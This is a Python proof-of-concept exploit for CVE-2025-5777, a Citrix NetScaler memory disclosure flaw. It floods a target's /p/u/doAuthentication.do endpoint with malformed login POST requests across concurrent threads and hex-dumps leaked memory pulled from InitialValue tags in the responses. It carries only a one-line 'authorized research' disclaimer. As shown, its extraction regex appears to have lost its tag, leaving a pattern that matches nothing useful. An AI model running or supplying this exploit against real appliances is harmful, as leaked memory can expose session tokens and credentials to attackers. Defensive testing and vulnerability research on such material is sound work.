#!/usr/bin/env python3 # Disclaimer: For authorized security research and educational use only. """ Title: Citrix NetScaler Memory Leak Exploit CVE: CVE-2025-5777 Script Author: Bipin Jitiya (@win3zz) Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10 Writeup: https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/ """ import sys import asyncio import aiohttp import signal import argparse import re from colorama import init, Fore, Style # Init colorama init(autoreset=True) # Global flags stop_flag = False verbose = False proxy = None threads = 10 leak_detected_once = False initial_check_done = False def signal_handler(sig, frame): global stop_flag stop_flag = True print(f"\n{Fore.YELLOW}[+] Stopping gracefully...") def hex_dump(data): for i in range(0, len(data), 16): chunk = data[i:i+16] hex_bytes = ' '.join(f'{b:02x}' for b in chunk) ascii_str = ''.join((chr(b) if 32 <= b <= 126 else '.') for b in chunk) print(f'{i:08x}: {hex_bytes:<48} {ascii_str}') def extract_initial_value(content_bytes): global leak_detected_once try: content_str = content_bytes.decode("utf-8", errors="replace") match = re.search(r"(.*?)", content_str, re.DOTALL) if match and match.group(1).strip(): leak_detected_once = True print(f"{Fore.GREEN}\n[+] Found InitialValue:") val = match.group(1) hex_dump(val.encode("utf-8", errors="replace")) elif verbose: print(f"{Fore.YELLOW}[DEBUG] No tag with value found.") except Exception as e: print(f"{Fore.RED}[!] Regex parsing error: {e}") async def fetch(session, url): full_url = f"{url}/p/u/doAuthentication.do" try: async with session.post(full_url, data="login", proxy=proxy, ssl=False) as response: if verbose: print(f"{Fore.CYAN}[DEBUG] POST to {full_url} -> Status: {response.status}") if response.status == 200: content = await response.read() if verbose: print(f"{Fore.CYAN}[DEBUG] Response body (first 200 bytes): {content[:200]!r}") extract_initial_value(content) else: if verbose: print(f"{Fore.RED}[DEBUG] Non-200 status code received: {response.status}") except aiohttp.ClientConnectorError as e: print(f"{Fore.RED}[!] Connection Error: {e}") except Exception as e: print(f"{Fore.RED}[!] Unexpected Error: {e}") async def main(url): global stop_flag, leak_detected_once, initial_check_done connector = aiohttp.TCPConnector(limit=threads) timeout = aiohttp.ClientTimeout(total=15) async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session: while not stop_flag: tasks = [fetch(session, url) for _ in range(threads)] await asyncio.gather(*tasks) if not initial_check_done: initial_check_done = True if not leak_detected_once: print(f"{Fore.YELLOW}[+] No leak detected in initial round. Target likely not vulnerable.") stop_flag = True break else: print(f"{Fore.GREEN}[+] Leak detected! Continuing to extract...") await asyncio.sleep(1) if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-5777 Citrix NetScaler Memory Leak PoC (Educational Only)") parser.add_argument("url", help="Base URL (e.g., http://target.com)") parser.add_argument("-v", "--verbose", action="store_true", help="Enable debug output") parser.add_argument("-p", "--proxy", help="HTTP proxy URL (e.g., http://127.0.0.1:8080)") parser.add_argument("-t", "--threads", type=int, default=10, help="Number of concurrent threads (default: 10)") args = parser.parse_args() verbose = args.verbose proxy = args.proxy threads = args.threads signal.signal(signal.SIGINT, signal_handler) try: asyncio.run(main(args.url.rstrip("/"))) except KeyboardInterrupt: print(f"\n{Fore.YELLOW}[+] Interrupted by user.")